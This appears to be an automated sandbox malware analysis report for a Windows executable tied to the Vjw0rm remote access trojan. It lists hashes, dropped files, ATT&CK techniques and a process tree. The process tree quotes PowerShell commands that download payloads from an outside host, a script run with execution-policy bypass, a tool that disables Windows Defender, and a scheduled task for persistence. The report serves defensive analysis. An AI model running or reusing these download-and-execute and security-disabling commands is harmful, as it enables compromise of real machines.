Analysis

  • max time kernel
    135s
  • max time network
    113s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    29-06-2021 19:16

General

  • Target

    22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe

  • Size

    3.1MB

  • MD5

    52bbd67fdb23378f2ad43efb150abdc4

  • SHA1

    9d138f1bf129473cb0d74c0d94ec8af2daa311c7

  • SHA256

    22f93b97e4ee74c1af48cbdcf878a983cbe2fba7eefc5cd639814dc942cbaa8d

  • SHA512

    7cf115c532466de78abd369ba202f738a3520f7c2b87c4847a8d8e59dc6e2c0d7cd9da1995d019690edd92b3ed154a9d659b7a6932c091e9c042192a66049755

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderControl.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderKill.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gamecardsy.com/ahmadtestupl/Defender.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gamecardsy.com/ahmadtestupl/ff.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gamecardsy.com/ahmadtestupl/DefenderControl.txt

Signatures

  • Modifies security service 2 TTPs 1 IoCs
  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Drops startup file 4 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe
    "C:\Users\Admin\AppData\Local\Temp\22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3896
    • C:\ProgramData\Setup.exe
      C:\ProgramData\Setup.exe
      2⤵
      • Modifies security service
      • Executes dropped EXE
      • Suspicious behavior: GetForegroundWindowSpam
      PID:1636
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\start.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2880
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.exe', 'C:\Users\Public\DefenderControl.exe') }"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4028
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderKill.txt', 'C:\Users\Public\DefenderKill.lnk') }"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2424
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/Defender.bat', 'C:\Users\Public\Defender.bat') }"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2896
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/ff.ps1', 'C:\Users\Public\ff.ps1') }"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:936
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://gamecardsy.com/ahmadtestupl/DefenderControl.txt', 'C:\Users\Public\DefenderControl.ini') }"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2116
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -File C:\Users\Public\ff.ps1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1508
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Defender.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2128
          • C:\Users\Public\DefenderControl.exe
            DefenderControl.exe /D
            5⤵
            • Executes dropped EXE
            • Windows security modification
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:1156
          • C:\Users\Public\DefenderControl.exe
            DefenderControl.exe /Q
            5⤵
            • Executes dropped EXE
            PID:3900
    • C:\ProgramData\conhostHost.exe
      C:\ProgramData\conhostHost.exe
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:580
      • C:\ProgramData\conhost.exe
        C:\ProgramData/conhost.exe
        3⤵
        • Executes dropped EXE
        • Drops startup file
        • Adds Run key to start application
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
          4⤵
          • Creates scheduled task(s)
          PID:3676
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
    1⤵
      PID:1928
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
      1⤵
        PID:3172
      • \??\c:\windows\system32\gpscript.exe
        gpscript.exe /RefreshSystemParam
        1⤵
          PID:3884
        • C:\ProgramData\conhost.exe
          C:\ProgramData\conhost.exe
          1⤵
          • Executes dropped EXE
          • Drops startup file
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:1808
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
            2⤵
            • Creates scheduled task(s)
            PID:2920

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Scheduled Task

        1
        T1053

        Persistence

        Modify Existing Service

        1
        T1031

        Registry Run Keys / Startup Folder

        1
        T1060

        Scheduled Task

        1
        T1053

        Privilege Escalation

        Scheduled Task

        1
        T1053

        Defense Evasion

        Modify Registry

        4
        T1112

        Disabling Security Tools

        1
        T1089

        Install Root Certificate

        1
        T1130

        Discovery

        System Information Discovery

        1
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\Setup.exe
          MD5

          1d3072caa9c82faea4ce0aff3c267d5f

          SHA1

          45431656c6d6e841c40bc8e80bed891193caff21

          SHA256

          48efc1e775c88e01600b049e1e55831fefaea5d624d94892a6efaa632181e2fe

          SHA512

          9d26e856ace8d48382d16346bff089439f7263b2c3f9c4dbc2cd8a797a704ab2d447df0e303b4a40cead274d0871aec1819ee81c40697efb7c759cae27ff76f5

        • C:\ProgramData\Setup.exe
          MD5

          1d3072caa9c82faea4ce0aff3c267d5f

          SHA1

          45431656c6d6e841c40bc8e80bed891193caff21

          SHA256

          48efc1e775c88e01600b049e1e55831fefaea5d624d94892a6efaa632181e2fe

          SHA512

          9d26e856ace8d48382d16346bff089439f7263b2c3f9c4dbc2cd8a797a704ab2d447df0e303b4a40cead274d0871aec1819ee81c40697efb7c759cae27ff76f5

        • C:\ProgramData\conhost.exe
          MD5

          fdbd7b1910d980cf7273796a0119d252

          SHA1

          47029af064a51454662909465ce38ee5cdcc62c7

          SHA256

          3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

          SHA512

          ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        • C:\ProgramData\conhost.exe
          MD5

          fdbd7b1910d980cf7273796a0119d252

          SHA1

          47029af064a51454662909465ce38ee5cdcc62c7

          SHA256

          3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

          SHA512

          ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        • C:\ProgramData\conhost.exe
          MD5

          fdbd7b1910d980cf7273796a0119d252

          SHA1

          47029af064a51454662909465ce38ee5cdcc62c7

          SHA256

          3e1da2d14de49132c42e8a4ddceb5efd36e066523affcc47de6d175316ab0f4e

          SHA512

          ab43e5ba29134c62a8beb000657f83b9471a64a839d3462c9625d059b5e259a75cdd27b2536150ae40931478384f6c13ef777756391cbe4cd9d95de35b581170

        • C:\ProgramData\conhost.exe.manifest
          MD5

          c52800b49b2392de3d171515d13b8dd2

          SHA1

          9c59962bb6dbf5317c2684ed542c1c12a7778747

          SHA256

          830bab8f10c1bd63d50e40e0137d9f26eac59fb8c4c4c53840c674e4793fcb66

          SHA512

          c36c8f8080d617e058c2325fb7515059c6a5c1eb97e8c76440f44a8c1889d6616d2b8c92ac2d8b1e1754409912722d941aaeb4cb28eda1df08c148ed3497559a

        • C:\ProgramData\conhostHost.exe
          MD5

          0556e409646df2fac47ab802d946c040

          SHA1

          a1c3717b3dd3ae7def30e9b8bb6dc92979b57de9

          SHA256

          7c46e3309671f2c70dc1c78b8bbeb132684d9f0014b6c4671e1d12cc75f8cd89

          SHA512

          60b6659b24949c20b32bc7e1b7e3a40bde4d5b0b354e55ea1aeadab05be448b89e1df3d094c01aaf008c93dec91d168193e77a63e6a26189341441905bb09596

        • C:\ProgramData\start.bat
          MD5

          25768ca0dbfdaafacf64ec31c72ab131

          SHA1

          0c06ddcc9592a62f76589dfd51e29558ade3db23

          SHA256

          dbb2aa62e7815bec646a0e160b658479040966edb3832c95e2647b0f3053df17

          SHA512

          6dbfb8b3beddf8c788d5d2d0d1cdf754a5892a787192f3d0461ec277eefa849db0d26c17595c8d006d576f969d05e57022420c8f5a15d09e2306228579e70182

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          MD5

          66382a4ca6c4dcf75ce41417d44be93e

          SHA1

          8132cbef1c12f8a89a68a6153ade4286bf130812

          SHA256

          a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

          SHA512

          2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          d57eefc7c5517d8b84fa7415aa6b1515

          SHA1

          f6584e65cd90a408b0c6399fc284ea30ef6e3487

          SHA256

          65f237d929afeff7fbddaa863ac0899815584bc24cea4144200c41ddb66a7aec

          SHA512

          350791f6d10297566fa4e6709a0a02545e2b9d1f582ae57e3f31103d28dbbf8f135cde92919bb45455135d504a27789ec4235ef402c8adb3d7f4b39f60f60f2b

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          51a950a2dd7c7e0069f303c1b45eb463

          SHA1

          ee5daa8db59b3ad9270916de39f142d3d4fffe50

          SHA256

          b48dc7ab9429c7dd46da3b0f64c569491e974b9cb1b870fbe9eca9614eb0b138

          SHA512

          cdc9687ecd162c2180ba4f181b79646abfd8a0cb492cc7acbb9165f837b3d3a9afcb63aff5c09160f965c58db2c9c7005bbbb2b038700d2a3514494cde33016a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          ea53a598ed0fe9e00468cb8f3a4fe462

          SHA1

          fc7fb895cbe58ab8619d3284a63fa6d3347abd91

          SHA256

          2aa53d33c287fe8f9d6660fd9bfd5f4d17af552f400585e1580f58d1960a4026

          SHA512

          8055f324644e0cf8fd40c3b3861dddb974f72eadda92583319ee394b04600014a934fa208e57d45a5b6d20a5321e2ca03c28859f4306d7f8e115a942c4138be7

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          7bd3d46401369210307b29ee92c54cef

          SHA1

          296ef2c433e37342b144e792fa4dc13d4f372fbd

          SHA256

          0499553160af732fcb0929de8984d710eaf70af0264bb53bc04d1b2c1811bab7

          SHA512

          1f0977cef40e586556c29f2b9dad0fb60a4de15851a807a0a885022e479afd0a0429316ce126d7413bd5b8d7b23b91bb9b0edb3f90e77079fd05d3f09b36d333

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          3135feea2fdbd078fbf7f6741139474b

          SHA1

          0893a6fb076dce16a148a640b2e80802d96114f3

          SHA256

          56e363204c35adefe9acee542ca824fdfba481f907cf48bc53c43d1cf7048414

          SHA512

          ec9e3404914f03e224c76c7209ce0118eec80c7207386aa5f68d3e1bf5e535d8f3cf31a808fd0957a893264edf850c696e91f12a5458172b0ffb421e19abdb66

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • C:\Users\Public\Defender.bat
          MD5

          6e18e46e1925e47c36dd5c936abc9ae7

          SHA1

          eaaff27bde9261cd3ebaf569cf0f2566a2269464

          SHA256

          989b2c6f7dab1f36a2c21fbc165fa73e6e5aa22a35c63aedfc41727fe5cfcd1e

          SHA512

          de94f9f41e74c9b52265ab3d79c20df89ec946a9ab56ac5dcc3b5d5bca7bec5ac8eae506b3da6c592daeae6d3569e78c678bd52739e493f5490a65372157c0c1

        • C:\Users\Public\DefenderControl.exe
          MD5

          139464919440e93e49c80cc890b90585

          SHA1

          0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

          SHA256

          ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

          SHA512

          d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

        • C:\Users\Public\DefenderControl.exe
          MD5

          139464919440e93e49c80cc890b90585

          SHA1

          0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

          SHA256

          ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

          SHA512

          d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

        • C:\Users\Public\DefenderControl.exe
          MD5

          139464919440e93e49c80cc890b90585

          SHA1

          0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

          SHA256

          ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

          SHA512

          d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

        • C:\Users\Public\DefenderKill.lnk
          MD5

          429eeaa2203c3a2e0f214283715ae07e

          SHA1

          d63147618c6e92d5f38dc8816b633049f004c729

          SHA256

          d1394f2f94909d3351b663b93c5eb6ca902d3f9f21f528adf1fd86eeba8f819c

          SHA512

          a39e4f97f490e4255fd2356b7543e59771b1df98b502031b601d9125719c52e2af46a845e5627b27c0c5aa0e8587ab193dca4cf03d7c392eeb99a74c7257b76d

        • C:\Users\Public\ff.ps1
          MD5

          76689eadd2c4317ec7d2f5abe74df2ba

          SHA1

          99ca8d374b94518ccf47fd4ec4aa202059ad254d

          SHA256

          35c900caf65e96d12977782e9299b8d851e61ae9d0d6505f1a3a9c23cf0e79f0

          SHA512

          315770b7e176a5c217ae59ee26f2bfa7b9bd79138501a5be36b48cad2453a998a6fc4d89c9bae9250348a777416d691a6d3f777dffe6e745e3bf4d402e9cd97e

        • memory/580-223-0x0000000000000000-mapping.dmp
        • memory/936-203-0x0000000005423000-0x0000000005424000-memory.dmp
          Filesize

          4KB

        • memory/936-200-0x0000000005420000-0x0000000005421000-memory.dmp
          Filesize

          4KB

        • memory/936-201-0x0000000005422000-0x0000000005423000-memory.dmp
          Filesize

          4KB

        • memory/936-188-0x0000000000000000-mapping.dmp
        • memory/1156-216-0x0000000000000000-mapping.dmp
        • memory/1508-220-0x0000000004C84000-0x0000000004C86000-memory.dmp
          Filesize

          8KB

        • memory/1508-219-0x0000000004C83000-0x0000000004C84000-memory.dmp
          Filesize

          4KB

        • memory/1508-211-0x0000000004C82000-0x0000000004C83000-memory.dmp
          Filesize

          4KB

        • memory/1508-210-0x0000000004C80000-0x0000000004C81000-memory.dmp
          Filesize

          4KB

        • memory/1508-207-0x0000000000000000-mapping.dmp
        • memory/1636-114-0x0000000000000000-mapping.dmp
        • memory/2116-205-0x00000000072E2000-0x00000000072E3000-memory.dmp
          Filesize

          4KB

        • memory/2116-209-0x00000000072E3000-0x00000000072E4000-memory.dmp
          Filesize

          4KB

        • memory/2116-202-0x0000000000000000-mapping.dmp
        • memory/2116-204-0x00000000072E0000-0x00000000072E1000-memory.dmp
          Filesize

          4KB

        • memory/2128-215-0x0000000000000000-mapping.dmp
        • memory/2424-150-0x0000000003612000-0x0000000003613000-memory.dmp
          Filesize

          4KB

        • memory/2424-140-0x0000000000000000-mapping.dmp
        • memory/2424-148-0x0000000003610000-0x0000000003611000-memory.dmp
          Filesize

          4KB

        • memory/2424-176-0x0000000003613000-0x0000000003614000-memory.dmp
          Filesize

          4KB

        • memory/2764-225-0x0000000000000000-mapping.dmp
        • memory/2880-117-0x0000000000000000-mapping.dmp
        • memory/2896-164-0x0000000000000000-mapping.dmp
        • memory/2896-177-0x0000000004990000-0x0000000004991000-memory.dmp
          Filesize

          4KB

        • memory/2896-186-0x0000000004993000-0x0000000004994000-memory.dmp
          Filesize

          4KB

        • memory/2896-178-0x0000000004992000-0x0000000004993000-memory.dmp
          Filesize

          4KB

        • memory/2920-231-0x0000000000000000-mapping.dmp
        • memory/3676-229-0x0000000000000000-mapping.dmp
        • memory/3900-221-0x0000000000000000-mapping.dmp
        • memory/4028-128-0x00000000046B2000-0x00000000046B3000-memory.dmp
          Filesize

          4KB

        • memory/4028-129-0x00000000079E0000-0x00000000079E1000-memory.dmp
          Filesize

          4KB

        • memory/4028-130-0x0000000007850000-0x0000000007851000-memory.dmp
          Filesize

          4KB

        • memory/4028-131-0x0000000007DD0000-0x0000000007DD1000-memory.dmp
          Filesize

          4KB

        • memory/4028-127-0x00000000046B0000-0x00000000046B1000-memory.dmp
          Filesize

          4KB

        • memory/4028-126-0x0000000007970000-0x0000000007971000-memory.dmp
          Filesize

          4KB

        • memory/4028-125-0x0000000007720000-0x0000000007721000-memory.dmp
          Filesize

          4KB

        • memory/4028-124-0x0000000006EF0000-0x0000000006EF1000-memory.dmp
          Filesize

          4KB

        • memory/4028-132-0x0000000008130000-0x0000000008131000-memory.dmp
          Filesize

          4KB

        • memory/4028-123-0x0000000007080000-0x0000000007081000-memory.dmp
          Filesize

          4KB

        • memory/4028-122-0x0000000004580000-0x0000000004581000-memory.dmp
          Filesize

          4KB

        • memory/4028-137-0x0000000009820000-0x0000000009821000-memory.dmp
          Filesize

          4KB

        • memory/4028-119-0x0000000000000000-mapping.dmp
        • memory/4028-138-0x0000000008DC0000-0x0000000008DC1000-memory.dmp
          Filesize

          4KB

        • memory/4028-147-0x00000000046B3000-0x00000000046B4000-memory.dmp
          Filesize

          4KB